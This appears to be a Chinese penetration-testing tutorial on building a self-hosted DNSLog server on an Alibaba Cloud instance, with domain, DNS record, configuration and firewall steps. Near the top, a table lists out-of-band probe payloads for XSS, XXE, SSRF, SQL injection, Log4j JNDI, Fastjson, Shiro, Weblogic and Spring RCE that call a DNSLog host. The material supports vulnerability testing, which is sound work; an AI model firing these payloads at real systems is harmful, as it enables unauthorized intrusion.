M07-阿里云服务器自建DNSLog平台

# 说明
DNSLog平台是挖掘漏洞、渗透测试过程中一种常见的漏洞探测手段。
由于常用的DNSLog平台有可能会被安全设备检测、屏蔽、拦截，本文提供一种自建DNSLog服务器的方法。

# 常用的DNSLog平台
Burp Collaborator（BP自带）
http://dnslog.cn
http://ceye.io
http://dnslog.pw/dns
http://eyes.sh/dns

Burp Suite 2024找不到collabroator功能
https://wiki.bafangwy.com/doc/762/

# DNSLog平台可以验证的漏洞
`abcdef.dnslog.cn` 代表本次的子域名

| 漏洞 | payload |
| --- | --- |
| XSS漏洞 | `<script src=http://qqq.abcdef.dnslog.cn></script>` |
| XXE漏洞 | `<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [<!ENTITY % remote SYSTEM "http://wuyatest.abcdef.dnslog.cn">%remote;]>` |
| SSRF漏洞 | `http://xxx.com/ssrf.php?url=http://abcdef.dnslog.cn` |
| SQL注入漏洞 | `http://localhost/sqli-labs/Less-5/?id=1' and if((select load_file(concat('////','qqq','.abcdef.dnslog.cn/wuya'))),1,0) --+` |
| RCE漏洞 | `abcdef.dnslog.cn` |
| [JNDI注入-Log4j2-漏洞（vulhub复现）](https://www.freebuf.com/vuls/358373.html "Log4j-JNDI注入漏洞（vulhub复现）") | `http://xxx.com/cores?action=${jndi:ldap://abcdef.dnslog.cn}` |
| [反序列化-Fastjson1.2.24（vulhub复现）](https://blog.csdn.net/qq_45300786/article/details/118636692 "Fastjson1.2.24反序列化（vulhub复现）") | post body `{"zeo":{"@type":"java.net.Inet4Address","val":"abcdef.dnslog.cn"}}` |
| [反序列化-Shiro（vulhub复现）](https://www.cnblogs.com/kyooo/p/13857158.html "Shiro反序列化（vulhub复现）") | 利用脚本 `python shiro_poc.py "abcdef.dnslog.cn"` |
| [SSRF - Weblogic（vulhub复现）](https://blog.51cto.com/u_16227132/7367528 "Weblogic-SSRF（vulhub复现）") | post字段 `operator=abcdef.dnslog.cn` |
| [Spring RCE漏洞](https://www.secpulse.com/archives/176618.html "Spring RCE漏洞") | `http://xxx.com:8080/rce?class.module.classLoader.resources.context.configFile=http://spring-qqq.abcdef.dnslog.cn/test&class.module.classLoader.resources.context.configFile.content.aaa=xxx` |
|  |  |

# 〇、准备工作
1、购买一个域名
https://wanwang.aliyun.com/
cn域名：注册35元，续费39元/年
top域名：注册12元，续费32元/年
com域名：注册78元，续费85元/年
cc域名：注册29元，续费75元/年
tech：注册8元，续费99元/年

2、购买一个ECS服务器，参考：
https://wiki.bafangwy.com/doc/516/

注：有同学不备案也可以访问。备案不是必需的。

# 一、设置DNS解析
下面以`qingshan.tech`域名，IP `47.106.8.175` 为例
进入域名控制台，点击域名列表
https://dc.console.aliyun.com/#/overview

域名右侧点击“解析”：

![](/media/202406/2024-06-07_180506_9387530.12503378234114582.png)

添加两条记录：

| 主机记录 | 记录类型 |记录纸 |
| --- | --- | --- |
| log | A | 你的服务器IP |
| dnslog | NS | log.xxx.com (你的域名) |

![](/media/202406/2024-06-07_182640_9465020.199012410095449.png)

结果如图：
![](/media/202406/2024-06-07_180546_4800030.7527457124085928.png)

# 二、下载解压程序
注意unzip会解压到当前目录，所以创建一个目录：
```
mkdir dnslog
cd dnslog
wget https://resource.if010.com/DNSlog-GO/dnslog-linux.zip
unzip dnslog-linux.zip
```

# 三、编辑配置
`vim config.yaml`
只修改密码和域名即可，dnslog子域名不用动。
密码在打开网页的时候需要输入。

内容：
```
HTTP:
  port: 8000
  #{"token":"用户对应子域名"}
  user: { "设置一个密码": "dnslog" }
  consoleDisable: false
Dns:
  domain: qingshan.tech #改成你的域名
```

# 四、运行程序
后台启动：
`./dnslog-linux &`

注意：
这个程序会占用两个端口，一个是53 DNS服务的端口。
一个是8000，HTTP 管理界面的端口。

![](/media/202406/2024-06-07_181226_4871360.5994417469133299.png)

# 五、安全组设置
F21-阿里云ECS设置安全组规则
https://wiki.bafangwy.com/doc/722/

<font color="red">开放TCP 8000端口，UDP 53端口。</font>

# 六、使用
## 1、打开网页
http://47.106.8.175:8000/

第一次打开需要输入密码，也就是yml文件里面token位置的值。

## 2、获得子域名
点击“复制随机子域名”，获得子域名

![](/media/202406/2024-06-07_182120_8565210.49133759677610855.png)

## 3、ping验证

![](/media/202406/2024-06-07_182155_2588640.008018449322046428.png)

得到结果：

![](/media/202406/2024-06-07_182215_6289960.6585341818535909.png)

>d DNSLog平台里面的IP Address没有任何意义，不用管！

备用下载地址：
dnslog-linux.zip
https://msb-netdisk.mashibing.com/share/0a121637495b46b6a311bd9964a4ccaf